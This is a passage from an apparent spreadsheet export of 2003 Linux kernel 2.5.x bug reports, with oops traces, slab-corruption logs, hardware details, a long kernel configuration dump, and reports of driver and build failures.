Steps to reproduce: The kernel is compiled with root@gswi1164:/usr/src/linux-2.5.65# grep CRYPT .config CONFIG_CRYPTO=y CONFIG_CRYPTO_HMAC=y CONFIG_CRYPTO_NULL=y CONFIG_CRYPTO_MD4=m CONFIG_CRYPTO_MD5=m CONFIG_CRYPTO_SHA1=m CONFIG_CRYPTO_SHA256=m CONFIG_CRYPTO_SHA512=m CONFIG_CRYPTO_DES=m CONFIG_CRYPTO_BLOWFISH=m CONFIG_CRYPTO_TWOFISH=m CONFIG_CRYPTO_SERPENT=m CONFIG_CRYPTO_AES=m CONFIG_CRYPTO_TEST=m root@gswi1164:/usr/src/linux-2.5.65# grep IPV6 .config CONFIG_IPV6=y CONFIG_IPV6_PRIVACY=y</t>
  </si>
  <si>
    <t>Oops in packet_read_proc</t>
  </si>
  <si>
    <t>2003-03-21 12:43 UTC</t>
  </si>
  <si>
    <t>Dave Beckett</t>
  </si>
  <si>
    <t>2003-05-13 16:02 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian unstable/sid Hardware Environment: AMD XP1700, VIA VT8366, RTL-8139, HPT372A, MGA G550 Software Environment: XFree86 4.2.1-6 Problem Description: Oops in packet_read_proc Repeatably happens when I log out of X and the kdm is shutting down and restarting the X server - the process that dies is 'cat' so it must be somewhere in the guts of the logout/reset. Steps to reproduce: From kdm, log into X, log out. =================================================================== Output of scripts/ver_linux: Linux foo 2.5.65 #1 Tue Mar 18 08:55:44 GMT 2003 i686 unknown unknown GNU/Linux Gnu C 3.2.3 Gnu make 3.80 util-linux 2.11y mount 2.11y module-init-tools 0.9.10 e2fsprogs 1.32 jfsutils 1.1.1 PPP 2.4.1 Linux C Library 2.3.1 Dynamic linker (ldd) 2.3.1 Procps 3.1.6 Net-tools 1.60 Console-tools 0.2.3 Sh-utils 4.5.10 Modules Loaded parport_pc lp parport snd_pcm_oss snd_mixer_oss snd_ens1371 snd_rawmidi snd_pcm snd_timer snd_ac97_codec snd iptable_mangle iptable_filter ipt_MASQUERADE ip_nat_ftp iptable_nat ip_conntrack_ftp ip_conntrack 8139too natsemi crc32 uhci_hcd usbcore raid1 es1371 ac97_codec =================================================================== ksymoops 2.4.8 on i686 2.5.65. Options used -v /usr/src/linux-2.5.65/vmlinux (specified) -k /proc/ksyms (default) -l /proc/modules (default) -o /lib/modules/2.5.65/ (default) -m /boot/System.map-2.5.65 (default) Error (regular_file): read_ksyms stat /proc/ksyms failed No modules in ksyms, skipping objects No ksyms, skipping lsmod Oops: 0002 CPU: 0 EIP: 0060:[&lt;c02bc327&gt;] Not tainted Using defaults from ksymoops -t elf32-i386 -a i386 EFLAGS: 00013246 eax: 00000000 ebx: 00000059 ecx: 00000059 edx: 0804c091 esi: 0804c038 edi: 00015002 ebp: d3d11f1c esp: d3d11f0c ds: 007b es: 007b ss: 0068 Stack: 00000053 00000059 d8389580 00000059 d3d11f70 c0156058 00015002 0804c038 00000059 00000059 00000000 d7fff280 d3d10000 d3d10000 00015002 d3d10000 d83895e8 00000001 00000059 00000000 0804d000 0804e000 d7fc6cc0 00000000 Call Trace: [&lt;c0156058&gt;] pipe_write+0x278/0x2c0 [&lt;c014a896&gt;] vfs_write+0xb6/0x190 [&lt;c014a9fc&gt;] sys_write+0x3c/0x50 [&lt;c010ae5b&gt;] syscall_call+0x7/0xb Code: f3 aa 58 59 e9 16 a2 f1 ff 66 c7 05 b1 66 1d c0 eb 1a e9 8f &gt;&gt;EIP; c02bc327 &lt;packet_read_proc+c27/131f&gt; &lt;===== &gt;&gt;ebp; d3d11f1c &lt;_end+1395b508/3fc494f0&gt; &gt;&gt;esp; d3d11f0c &lt;_end+1395b4f8/3fc494f0&gt; Trace; c0156058 &lt;pipe_write+278/2c0&gt; Trace; c014a896 &lt;vfs_write+b6/190&gt; Trace; c014a9fc &lt;sys_write+3c/50&gt; Trace; c010ae5b &lt;syscall_call+7/b&gt; Code; c02bc327 &lt;packet_read_proc+c27/131f&gt; 00000000 &lt;_EIP&gt;: Code; c02bc327 &lt;packet_read_proc+c27/131f&gt; &lt;===== 0: f3 aa repz stos %al,%es:(%edi) &lt;===== Code; c02bc329 &lt;packet_read_proc+c29/131f&gt; 2: 58 pop %eax Code; c02bc32a &lt;packet_read_proc+c2a/131f&gt; 3: 59 pop %ecx Code; c02bc32b &lt;packet_read_proc+c2b/131f&gt; 4: e9 16 a2 f1 ff jmp fff1a21f &lt;_EIP+0xfff1a21f&gt; Code; c02bc330 &lt;packet_read_proc+c30/131f&gt; 9: 66 c7 05 b1 66 1d c0 movw $0x1aeb,0xc01d66b1 Code; c02bc337 &lt;packet_read_proc+c37/131f&gt; 10: eb 1a Code; c02bc339 &lt;packet_read_proc+c39/131f&gt; 12: e9 8f 00 00 00 jmp a6 &lt;_EIP+0xa6&gt; 1 error issued. Results may not be reliable.</t>
  </si>
  <si>
    <t>make rpm fails; no kernel-2.5.65/debugfiles.list</t>
  </si>
  <si>
    <t>2003-03-21 13:02 UTC</t>
  </si>
  <si>
    <t>John Reiser</t>
  </si>
  <si>
    <t>2003-06-14 13:02 UTC</t>
  </si>
  <si>
    <t>Zip drive parallel-port driver causes segfault in 2.5.x</t>
  </si>
  <si>
    <t>2.5.x</t>
  </si>
  <si>
    <t>2003-03-23 12:51 UTC</t>
  </si>
  <si>
    <t>walt</t>
  </si>
  <si>
    <t>Patrick Mansfield</t>
  </si>
  <si>
    <t>Distribution:gentoo linux 1.4 Hardware Environment:soyo k7via/single Athlon mb Software Environment:gcc3.2.2/module-init-tools 0.9.10-r4 Problem Description: ppa module doesn't work properly and, if compiled into kernel it causes a kernel panic at boot. Steps to reproduce:compile ppa.ko as a module and modprobe ppa: Error messages include 'scheduling while atomic' and 'oops: 0004 [#2]' and 'unable to handle kernel paging request' and 'modprobe exited with preempt_count 1'. This same problem has existed at least since kernel 2.5.49 when I started trying the 2.5 series, and I suspect that ppa has never worked with 2.5 kernels, but I don't know for sure. The driver works fine with 2.4 kernels. Note: it is NOT necessary to have a parallel Zip drive to test this kernel module. The ppa module should load without error even with no Zip drive connected!</t>
  </si>
  <si>
    <t>Logitech USB cordless optical trackball no longer works</t>
  </si>
  <si>
    <t>2.5.65-bk4</t>
  </si>
  <si>
    <t>2003-03-24 11:46 UTC</t>
  </si>
  <si>
    <t>David van Hoose</t>
  </si>
  <si>
    <t>2003-03-24 19:45 UTC</t>
  </si>
  <si>
    <t>Distribution: RedHat 8.0 Hardware Environment: Asus P4S8X motherboard w/ Northwood Pentium 4 2.53GHz Logitech USB cordless optical trackball Software Environment: N/A Problem Description: Since 2.5.64, my trackball is no longer working. On bootup, a single message about a new USB device being found is displayed, but the typical HID input response never appears and the trackball doesn't work. I get the below message later: drivers/usb/core/message.c: usb_control/bulk_msg: timeout Steps to reproduce: Never works.</t>
  </si>
  <si>
    <t>No ataraid support in 2.5.65?</t>
  </si>
  <si>
    <t>2003-03-24 12:44 UTC</t>
  </si>
  <si>
    <t>John P. Davis</t>
  </si>
  <si>
    <t>2004-12-01 12:20 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo 1.4_rc3 Hardware Environment: AMD Athlon XP 1900+ Software Environment: gcc 3.2.2/ GLIBC 2.3.2 Problem Description: This may not actually be a problem, but I have not seen anything in the kernel config or the source itself for ataraid under x86. I have checked the mailing lists, but there is no pertinent information there. I am using a HighPoint 370 PCI RAID controller. Either I am missing this, or the support is just not there. Any information? Steps to reproduce: Look for ataraid support in the kernel config. It is not there. A `grep -irn ataraid *` in the kernel source tree returns ataraid only in non-x86 architectures.</t>
  </si>
  <si>
    <t>conntrack related slab corruption.</t>
  </si>
  <si>
    <t>Netfilter/Iptables</t>
  </si>
  <si>
    <t>2003-03-24 14:13 UTC</t>
  </si>
  <si>
    <t>2003-05-04 19:19 UTC</t>
  </si>
  <si>
    <t>Harald Welte</t>
  </si>
  <si>
    <t>Slab corruption: start=cf480a84, expend=cf480bb7, problemat=cf480aec Last user: [&lt;c03ed43a&gt;](destroy_conntrack+0xf8/0x159) Data: +****************************************************************************************+****************EC 0A 48 CF EC 0A 48 CF +****************************************************************************************+****************************************************************************************+*******************A5 Next: 71 F0 2C .3A D4 3E C0 71 F0 2C .******************** slab error in check_poison_obj(): cache `ip_conntrack': object was modified after freeingCall Trace: [&lt;c0144496&gt;] check_poison_obj+0x155/0x195 [&lt;c0145e4b&gt;] kmem_cache_alloc+0x139/0x177 [&lt;c03edfba&gt;] init_conntrack+0x8d/0x44f [&lt;c03edfba&gt;] init_conntrack+0x8d/0x44f [&lt;c03ee586&gt;] ip_conntrack_in+0x20a/0x2bc [&lt;c03db2eb&gt;] udp_connect+0xa8/0x353 [&lt;c03aa074&gt;] nf_iterate+0x5f/0x93 [&lt;c03b9634&gt;] dst_output+0x0/0x2d [&lt;c03aa3db&gt;] nf_hook_slow+0xa9/0x205 [&lt;c03b9634&gt;] dst_output+0x0/0x2d [&lt;c03b7a84&gt;] ip_queue_xmit+0x435/0x525 [&lt;c03b9634&gt;] dst_output+0x0/0x2d [&lt;c039d1df&gt;] __kfree_skb+0x89/0xfe [&lt;c014437c&gt;] check_poison_obj+0x3b/0x195 [&lt;c03d0eeb&gt;] tcp_v4_send_check+0x4d/0xd8 [&lt;c03ca6ae&gt;] tcp_transmit_skb+0x3b0/0x5b3 [&lt;c03cd026&gt;] tcp_connect+0x3af/0x47b [&lt;c02aa34e&gt;] secure_tcp_sequence_number+0x82/0xa0 [&lt;c03d0237&gt;] tcp_v4_connect+0x393/0x5db [&lt;c03e3f1d&gt;] inet_stream_connect+0x264/0x3bc [&lt;c0398ae2&gt;] move_addr_to_kernel+0x6b/0x6f [&lt;c039a2d8&gt;] sys_connect+0x78/0x99 [&lt;c0398c00&gt;] sock_destroy_inode+0x1d/0x21 [&lt;c0398c00&gt;] sock_destroy_inode+0x1d/0x21 [&lt;c0178bbc&gt;] destroy_inode+0x36/0x50 [&lt;c017a493&gt;] iput+0x63/0x7c [&lt;c01760b3&gt;] dput+0x24/0x333 [&lt;c039adb1&gt;] sys_socketcall+0xb2/0x262 [&lt;c015c938&gt;] filp_close+0xe9/0x12d [&lt;c015ca13&gt;] sys_close+0x97/0xdf [&lt;c010978f&gt;] syscall_call+0x7/0xb</t>
  </si>
  <si>
    <t>VAIO support does not compile in Kernel 2.5.65</t>
  </si>
  <si>
    <t>2003-03-25 04:27 UTC</t>
  </si>
  <si>
    <t>Michael Thaler</t>
  </si>
  <si>
    <t>2003-04-15 08:51 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Unstable Hardware Environment: Sony VAIO Notebook Software Environment: Problem Description:VAIO support does not compile in Kernel 2.5.65 Steps to reproduce: If Sony Vaio support is activated, compilation stops with an error message.</t>
  </si>
  <si>
    <t>error linking kernel, cs4232_pnp_remove</t>
  </si>
  <si>
    <t>2.5.66-bk1</t>
  </si>
  <si>
    <t>2003-03-25 08:02 UTC</t>
  </si>
  <si>
    <t>2003-04-10 08:27 UTC</t>
  </si>
  <si>
    <t>fbcon sleeping function call from illegal context</t>
  </si>
  <si>
    <t>Page Allocator</t>
  </si>
  <si>
    <t>2003-03-25 11:04 UTC</t>
  </si>
  <si>
    <t>2003-04-22 08:55 UTC</t>
  </si>
  <si>
    <t>Distribution:RedHat 8.0 Hardware Environment: processor : 0 vendor_id : AuthenticAMD cpu family : 6 model : 4 model name : AMD Athlon(tm) Processor stepping : 2 cpu MHz : 1342.862 cache size : 256 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 1 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 sep mtrr pge mca cmov pat pse36 mmx fxsr syscall mmxext 3dnowext 3dnow bogomips : 2637.82 00:00.0 Host bridge: VIA Technologies, Inc. VT8363/8365 [KT133/KM133] (rev 03) 00:01.0 PCI bridge: VIA Technologies, Inc. VT8363/8365 [KT133/KM133 AGP] 00:04.0 ISA bridge: VIA Technologies, Inc. VT82C686 [Apollo Super South] (rev 40) 00:04.1 IDE interface: VIA Technologies, Inc. VT82C586B PIPC Bus Master IDE (rev 06) 00:04.2 USB Controller: VIA Technologies, Inc. USB (rev 16) 00:04.3 USB Controller: VIA Technologies, Inc. USB (rev 16) 00:04.4 Bridge: VIA Technologies, Inc. VT82C686 [Apollo Super ACPI] (rev 40) 00:0a.0 Multimedia audio controller: Yamaha Corporation YMF-754 [DS-1E Audio Controller] 00:0d.0 Ethernet controller: Intel Corp. 82557/8/9 [Ethernet Pro 100] (rev 08) 00:11.0 Unknown mass storage controller: Promise Technology, Inc. 20265 (rev 02) 01:00.0 VGA compatible controller: ATI Technologies Inc 3D Rage Pro AGP 1X/2X (rev 5c) Software Environment: # Automatically generated make config: don't edit # CONFIG_X86=y CONFIG_MMU=y CONFIG_UID16=y CONFIG_GENERIC_ISA_DMA=y # # Code maturity level options # CONFIG_EXPERIMENTAL=y # # General setup # CONFIG_SWAP=y CONFIG_SYSVIPC=y CONFIG_BSD_PROCESS_ACCT=y CONFIG_SYSCTL=y CONFIG_LOG_BUF_SHIFT=14 # # Loadable module support # CONFIG_MODULES=y CONFIG_MODULE_UNLOAD=y CONFIG_MODULE_FORCE_UNLOAD=y CONFIG_OBSOLETE_MODPARM=y CONFIG_MODVERSIONS=y CONFIG_KMOD=y # # Processor type and features # CONFIG_X86_PC=y # CONFIG_X86_VOYAGER is not set # CONFIG_X86_NUMAQ is not set # CONFIG_X86_SUMMIT is not set # CONFIG_X86_BIGSMP is not set # CONFIG_X86_VISWS is not set # CONFIG_M386 is not set # CONFIG_M486 is not set # CONFIG_M586 is not set # CONFIG_M586TSC is not set # CONFIG_M586MMX is not set # CONFIG_M686 is not set # CONFIG_MPENTIUMII is not set # CONFIG_MPENTIUMIII is not set # CONFIG_MPENTIUM4 is not set # CONFIG_MK6 is not set CONFIG_MK7=y # CONFIG_MK8 is not set # CONFIG_MELAN is not set # CONFIG_MCRUSOE is not set # CONFIG_MWINCHIPC6 is not set # CONFIG_MWINCHIP2 is not set # CONFIG_MWINCHIP3D is not set # CONFIG_MCYRIXIII is not set # CONFIG_MVIAC3_2 is not set CONFIG_X86_CMPXCHG=y CONFIG_X86_XADD=y CONFIG_X86_L1_CACHE_SHIFT=6 CONFIG_RWSEM_XCHGADD_ALGORITHM=y CONFIG_X86_WP_WORKS_OK=y CONFIG_X86_INVLPG=y CONFIG_X86_BSWAP=y CONFIG_X86_POPAD_OK=y CONFIG_X86_GOOD_APIC=y CONFIG_X86_USE_PPRO_CHECKSUM=y CONFIG_X86_USE_3DNOW=y # CONFIG_HUGETLB_PAGE is not set # CONFIG_SMP is not set # CONFIG_PREEMPT is not set # CONFIG_X86_UP_APIC is not set CONFIG_X86_TSC=y CONFIG_X86_MCE=y CONFIG_X86_MCE_NONFATAL=y # CONFIG_TOSHIBA is not set # CONFIG_I8K is not set # CONFIG_MICROCODE is not set CONFIG_X86_MSR=m CONFIG_X86_CPUID=m # CONFIG_EDD is not set CONFIG_NOHIGHMEM=y # CONFIG_HIGHMEM4G is not set # CONFIG_HIGHMEM64G is not set # CONFIG_MATH_EMULATION is not set CONFIG_MTRR=y # # Power management options (ACPI, APM) # CONFIG_PM=y # CONFIG_SOFTWARE_SUSPEND is not set # # ACPI Support # # CONFIG_ACPI is not set CONFIG_APM=y # CONFIG_APM_IGNORE_USER_SUSPEND is not set # CONFIG_APM_DO_ENABLE is not set CONFIG_APM_CPU_IDLE=y # CONFIG_APM_DISPLAY_BLANK is not set # CONFIG_APM_RTC_IS_GMT is not set # CONFIG_APM_ALLOW_INTS is not set # CONFIG_APM_REAL_MODE_POWER_OFF is not set # # CPU Frequency scaling # # CONFIG_CPU_FREQ is not set # # Bus options (PCI, PCMCIA, EISA, MCA, ISA) # CONFIG_PCI=y # CONFIG_PCI_GOBIOS is not set # CONFIG_PCI_GODIRECT is not set CONFIG_PCI_GOANY=y CONFIG_PCI_BIOS=y CONFIG_PCI_DIRECT=y # CONFIG_SCx200 is not set # CONFIG_PCI_LEGACY_PROC is not set CONFIG_PCI_NAMES=y # CONFIG_ISA is not set # CONFIG_MCA is not set CONFIG_HOTPLUG=y # # PCMCIA/CardBus support # # CONFIG_PCMCIA is not set # # PCI Hotplug Support # # CONFIG_HOTPLUG_PCI is not set # # Executable file formats # CONFIG_KCORE_ELF=y # CONFIG_KCORE_AOUT is not set CONFIG_BINFMT_AOUT=m CONFIG_BINFMT_ELF=y CONFIG_BINFMT_MISC=m # # Memory Technology Devices (MTD) # # CONFIG_MTD is not set # # Parallel port support # CONFIG_PARPORT=m CONFIG_PARPORT_PC=m CONFIG_PARPORT_PC_CML1=m # CONFIG_PARPORT_SERIAL is not set # CONFIG_PARPORT_PC_FIFO is not set # CONFIG_PARPORT_PC_SUPERIO is not set # CONFIG_PARPORT_OTHER is not set # CONFIG_PARPORT_1284 is not set # # Plug and Play support # # CONFIG_PNP is not set # # Block devices # CONFIG_BLK_DEV_FD=m # CONFIG_PARIDE is not set # CONFIG_BLK_CPQ_DA is not set # CONFIG_BLK_CPQ_CISS_DA is not set # CONFIG_BLK_DEV_DAC960 is not set # CONFIG_BLK_DEV_UMEM is not set CONFIG_BLK_DEV_LOOP=m # CONFIG_BLK_DEV_NBD is not set CONFIG_BLK_DEV_RAM=m CONFIG_BLK_DEV_RAM_SIZE=4096 # CONFIG_LBD is not set # # ATA/ATAPI/MFM/RLL device support # CONFIG_IDE=y # # IDE, ATA and ATAPI Block devices # CONFIG_BLK_DEV_IDE=y # # Please see Documentation/ide.txt for help/info on IDE drives # # CONFIG_BLK_DEV_HD_IDE is not set # CONFIG_BLK_DEV_HD is not set CONFIG_BLK_DEV_IDEDISK=y CONFIG_IDEDISK_MULTI_MODE=y # CONFIG_IDEDISK_STROKE is not set CONFIG_BLK_DEV_IDECD=m # CONFIG_BLK_DEV_IDEFLOPPY is not set # CONFIG_IDE_TASK_IOCTL is not set # # IDE chipset support/bugfixes # # CONFIG_BLK_DEV_CMD640 is not set CONFIG_BLK_DEV_IDEPCI=y CONFIG_BLK_DEV_GENERIC=y CONFIG_IDEPCI_SHARE_IRQ=y CONFIG_BLK_DEV_IDEDMA_PCI=y # CONFIG_BLK_DEV_IDE_TCQ is not set # CONFIG_BLK_DEV_OFFBOARD is not set # CONFIG_BLK_DEV_IDEDMA_FORCED is not set CONFIG_IDEDMA_PCI_AUTO=y # CONFIG_IDEDMA_ONLYDISK is not set CONFIG_BLK_DEV_IDEDMA=y # CONFIG_IDEDMA_PCI_WIP is not set CONFIG_BLK_DEV_ADMA=y # CONFIG_BLK_DEV_AEC62XX is not set # CONFIG_BLK_DEV_ALI15X3 is not set # CONFIG_BLK_DEV_AMD74XX is not set # CONFIG_BLK_DEV_CMD64X is not set # CONFIG_BLK_DEV_TRIFLEX is not set # CONFIG_BLK_DEV_CY82C693 is not set # CONFIG_BLK_DEV_CS5520 is not set # CONFIG_BLK_DEV_HPT34X is not set # CONFIG_BLK_DEV_HPT366 is not set # CONFIG_BLK_DEV_SC1200 is not set # CONFIG_BLK_DEV_PIIX is not set # CONFIG_BLK_DEV_NS87415 is not set # CONFIG_BLK_DEV_OPTI621 is not set # CONFIG_BLK_DEV_PDC202XX_OLD is not set # CONFIG_BLK_DEV_PDC202XX_NEW is not set # CONFIG_BLK_DEV_RZ1000 is not set # CONFIG_BLK_DEV_SVWKS is not set # CONFIG_BLK_DEV_SIIMAGE is not set # CONFIG_BLK_DEV_SIS5513 is not set # CONFIG_BLK_DEV_SLC90E66 is not set # CONFIG_BLK_DEV_TRM290 is not set CONFIG_BLK_DEV_VIA82CXXX=y CONFIG_IDEDMA_AUTO=y # CONFIG_IDEDMA_IVB is not set CONFIG_BLK_DEV_IDE_MODES=y # # SCSI device support # # CONFIG_SCSI is not set # # Multi-device support (RAID and LVM) # # CONFIG_MD is not set # # Fusion MPT device support # # # IEEE 1394 (FireWire) support (EXPERIMENTAL) # # CONFIG_IEEE1394 is not set # # I2O device support # # CONFIG_I2O is not set # # Networking support # CONFIG_NET=y # # Networking options # CONFIG_PACKET=m CONFIG_PACKET_MMAP=y CONFIG_NETLINK_DEV=m CONFIG_NETFILTER=y # CONFIG_NETFILTER_DEBUG is not set CONFIG_FILTER=y CONFIG_UNIX=m CONFIG_NET_KEY=m CONFIG_INET=y # CONFIG_IP_MULTICAST is not set # CONFIG_IP_ADVANCED_ROUTER is not set # CONFIG_IP_PNP is not set # CONFIG_NET_IPIP is not set # CONFIG_NET_IPGRE is not set # CONFIG_ARPD is not set # CONFIG_INET_ECN is not set CONFIG_SYN_COOKIES=y # CONFIG_INET_AH is not set # CONFIG_INET_ESP is not set # CONFIG_XFRM_USER is not set # # IP: Netfilter Configuration # CONFIG_IP_NF_CONNTRACK=m CONFIG_IP_NF_FTP=m CONFIG_IP_NF_IRC=m CONFIG_IP_NF_QUEUE=m CONFIG_IP_NF_IPTABLES=m CONFIG_IP_NF_MATCH_LIMIT=m CONFIG_IP_NF_MATCH_MAC=m CONFIG_IP_NF_MATCH_PKTTYPE=m CONFIG_IP_NF_MATCH_MARK=m CONFIG_IP_NF_MATCH_MULTIPORT=m CONFIG_IP_NF_MATCH_TOS=m CONFIG_IP_NF_MATCH_ECN=m CONFIG_IP_NF_MATCH_DSCP=m CONFIG_IP_NF_MATCH_AH_ESP=m CONFIG_IP_NF_MATCH_LENGTH=m CONFIG_IP_NF_MATCH_TTL=m CONFIG_IP_NF_MATCH_TCPMSS=m CONFIG_IP_NF_MATCH_HELPER=m CONFIG_IP_NF_MATCH_STATE=m CONFIG_IP_NF_MATCH_CONNTRACK=m CONFIG_IP_NF_MATCH_UNCLEAN=m CONFIG_IP_NF_MATCH_OWNER=m CONFIG_IP_NF_FILTER=m CONFIG_IP_NF_TARGET_REJECT=m CONFIG_IP_NF_TARGET_MIRROR=m CONFIG_IP_NF_NAT=m CONFIG_IP_NF_NAT_NEEDED=y CONFIG_IP_NF_TARGET_MASQUERADE=m CONFIG_IP_NF_TARGET_REDIRECT=m # CONFIG_IP_NF_NAT_LOCAL is not set CONFIG_IP_NF_NAT_SNMP_BASIC=m CONFIG_IP_NF_NAT_IRC=m CONFIG_IP_NF_NAT_FTP=m CONFIG_IP_NF_MANGLE=m CONFIG_IP_NF_TARGET_TOS=m CONFIG_IP_NF_TARGET_ECN=m CONFIG_IP_NF_TARGET_DSCP=m CONFIG_IP_NF_TARGET_MARK=m CONFIG_IP_NF_TARGET_LOG=m CONFIG_IP_NF_TARGET_ULOG=m CONFIG_IP_NF_TARGET_TCPMSS=m CONFIG_IP_NF_ARPTABLES=m CONFIG_IP_NF_ARPFILTER=m # CONFIG_IP_NF_COMPAT_IPCHAINS is not set # CONFIG_IP_NF_COMPAT_IPFWADM is not set # CONFIG_IPV6 is not set # # SCTP Configuration (EXPERIMENTAL) # CONFIG_IPV6_SCTP__=y # CONFIG_IP_SCTP is not set # CONFIG_ATM is not set # CONFIG_VLAN_8021Q is not set # CONFIG_LLC is not set # CONFIG_DECNET is not set # CONFIG_BRIDGE is not set # CONFIG_X25 is not set # CONFIG_LAPB is not set # CONFIG_NET_DIVERT is not set # CONFIG_ECONET is not set # CONFIG_WAN_ROUTER is not set # CONFIG_NET_FASTROUTE is not set # CONFIG_NET_HW_FLOWCONTROL is not set # # QoS and/or fair queueing # # CONFIG_NET_SCHED is not set # # Network testing # # CONFIG_NET_PKTGEN is not set CONFIG_NETDEVICES=y # # ARCnet devices # # CONFIG_ARCNET is not set CONFIG_DUMMY=m # CONFIG_BONDING is not set # CONFIG_EQUALIZER is not set # CONFIG_TUN is not set # CONFIG_ETHERTAP is not set # # Ethernet (10 or 100Mbit) # CONFIG_NET_ETHERNET=y # CONFIG_MII is not set # CONFIG_HAPPYMEAL is not set # CONFIG_SUNGEM is not set # CONFIG_NET_VENDOR_3COM is not set # # Tulip family network device support # # CONFIG_NET_TULIP is not set # CONFIG_HP100 is not set CONFIG_NET_PCI=y # CONFIG_PCNET32 is not set # CONFIG_AMD8111_ETH is not set # CONFIG_ADAPTEC_STARFIRE is not set # CONFIG_B44 is not set # CONFIG_DGRS is not set # CONFIG_EEPRO100 is not set CONFIG_E100=y # CONFIG_FEALNX is not set # CONFIG_NATSEMI is not set # CONFIG_NE2K_PCI is not set # CONFIG_8139CP is not set # CONFIG_8139TOO is not set # CONFIG_SIS900 is not set # CONFIG_EPIC100 is not set # CONFIG_SUNDANCE is not set # CONFIG_TLAN is not set # CONFIG_VIA_RHINE is not set # # Ethernet (1000 Mbit) # # CONFIG_ACENIC is not set # CONFIG_DL2K is not set # CONFIG_E1000 is not set # CONFIG_NS83820 is not set # CONFIG_HAMACHI is not set # CONFIG_YELLOWFIN is not set # CONFIG_R8169 is not set # CONFIG_SK98LIN is not set # CONFIG_TIGON3 is not set # CONFIG_FDDI is not set # CONFIG_HIPPI is not set # CONFIG_PLIP is not set # CONFIG_PPP is not set # CONFIG_SLIP is not set # # Wireless LAN (non-hamradio) # # CONFIG_NET_RADIO is not set # # Token Ring devices (depends on LLC=y) # # CONFIG_RCPCI is not set # CONFIG_SHAPER is not set # # Wan interfaces # # CONFIG_WAN is not set # # Amateur Radio support # # CONFIG_HAMRADIO is not set # # IrDA (infrared) support # # CONFIG_IRDA is not set # # ISDN subsystem # # CONFIG_ISDN_BOOL is not set # # Telephony Support # # CONFIG_PHONE is not set # # Input device support # CONFIG_INPUT=y # # Userland interfaces # CONFIG_INPUT_MOUSEDEV=y CONFIG_INPUT_MOUSEDEV_PSAUX=y CONFIG_INPUT_MOUSEDEV_SCREEN_X=1024 CONFIG_INPUT_MOUSEDEV_SCREEN_Y=768 # CONFIG_INPUT_JOYDEV is not set # CONFIG_INPUT_TSDEV is not set # CONFIG_INPUT_EVDEV is not set # CONFIG_INPUT_EVBUG is not set # # Input I/O drivers # # CONFIG_GAMEPORT is not set CONFIG_SOUND_GAMEPORT=y CONFIG_SERIO=y CONFIG_SERIO_I8042=y CONFIG_SERIO_SERPORT=y # CONFIG_SERIO_CT82C710 is not set # CONFIG_SERIO_PARKBD is not set # # Input Device Drivers # CONFIG_INPUT_KEYBOARD=y CONFIG_KEYBOARD_ATKBD=y # CONFIG_KEYBOARD_SUNKBD is not set # CONFIG_KEYBOARD_XTKBD is not set # CONFIG_KEYBOARD_NEWTON is not set CONFIG_INPUT_MOUSE=y CONFIG_MOUSE_PS2=y # CONFIG_MOUSE_SERIAL is not set # CONFIG_INPUT_JOYSTICK is not set # CONFIG_INPUT_TOUCHSCREEN is not set # CONFIG_INPUT_MISC is not set # # C# CONFIG_VT=y CONFIG_VT_CONSOLE=y CONFIG_HW_CONSOLE=y # CONFIG_SERIAL_NONSTANDARD is not set # # Serial drivers # CONFIG_SERIAL_8250=y CONFIG_SERIAL_8250_CONSOLE=y # CONFIG_SERIAL_8250_EXTENDED is not set # # Non-8250 serial port support # CONFIG_SERIAL_CORE=y CONFIG_SERIAL_CORE_CONSOLE=y CONFIG_UNIX98_PTYS=y CONFIG_UNIX98_PTY_COUNT=512 CONFIG_PRINTER=m # CONFIG_LP_CONSOLE is not set # CONFIG_PPDEV is not set # CONFIG_TIPAR is not set # # I2C support # CONFIG_I2C=m CONFIG_I2C_ALGOBIT=m CONFIG_I2C_PHILIPSPAR=m CONFIG_I2C_ELV=m CONFIG_I2C_VELLEMAN=m # CONFIG_SCx200_ACB is not set CONFIG_I2C_ALGOPCF=m CONFIG_I2C_ELEKTOR=m CONFIG_I2C_CHARDEV=m CONFIG_I2C_PROC=m # # I2C Hardware Sensors Mainboard support # # CONFIG_I2C_ALI15X3 is not set CONFIG_I2C_AMD756=m CONFIG_I2C_AMD8111=m # CONFIG_I2C_I801 is not set # CONFIG_I2C_PIIX4 is not set # # I2C Hardware Sensors Chip support # CONFIG_SENSORS_ADM1021=m CONFIG_SENSORS_LM75=m # # Mice # # CONFIG_BUSMOUSE is not set # CONFIG_QIC02_TAPE is not set # # IPMI # # CONFIG_IPMI_HANDLER is not set # # Watchdog Cards # # CONFIG_WATCHDOG is not set # CONFIG_HW_RANDOM is not set # CONFIG_NVRAM is not set CONFIG_RTC=m # CONFIG_GEN_RTC is not set # CONFIG_DTLK is not set # CONFIG_R3964 is not set # CONFIG_APPLICOM is not set # CONFIG_SONYPI is not set # # Ftape, the floppy tape device driver # # CONFIG_FTAPE is not set CONFIG_AGP=m # CONFIG_AGP3 is not set # CONFIG_AGP_INTEL is not set CONFIG_AGP_VIA=m # CONFIG_AGP_AMD is not set # CONFIG_AGP_SIS is not set # CONFIG_AGP_ALI is not set # CONFIG_AGP_SWORKS is not set # CONFIG_AGP_AMD_8151 is not set # CONFIG_DRM is not set # CONFIG_MWAVE is not set # CONFIG_RAW_DRIVER is not set # CONFIG_HANGCHECK_TIMER is not set # # Multimedia devices # # CONFIG_VIDEO_DEV is not set # # File systems # CONFIG_EXT2_FS=y CONFIG_EXT2_FS_XATTR=y # CONFIG_EXT2_FS_POSIX_ACL is not set CONFIG_EXT3_FS=y CONFIG_EXT3_FS_XATTR=y CONFIG_EXT3_FS_POSIX_ACL=y CONFIG_JBD=y # CONFIG_JBD_DEBUG is not set CONFIG_FS_MBCACHE=y # CONFIG_REISERFS_FS is not set # CONFIG_JFS_FS is not set CONFIG_FS_POSIX_ACL=y # CONFIG_XFS_FS is not set CONFIG_MINIX_FS=m # CONFIG_ROMFS_FS is not set # CONFIG_QUOTA is not set # CONFIG_AUTOFS_FS is not set # CONFIG_AUTOFS4_FS is not set # # CD-ROM/DVD Filesystems # CONFIG_ISO9660_FS=y CONFIG_JOLIET=y CONFIG_ZISOFS=y CONFIG_ZISOFS_FS=y # CONFIG_UDF_FS is not set # # DOS/FAT/NT Filesystems # CONFIG_FAT_FS=m CONFIG_MSDOS_FS=m CONFIG_VFAT_FS=m # 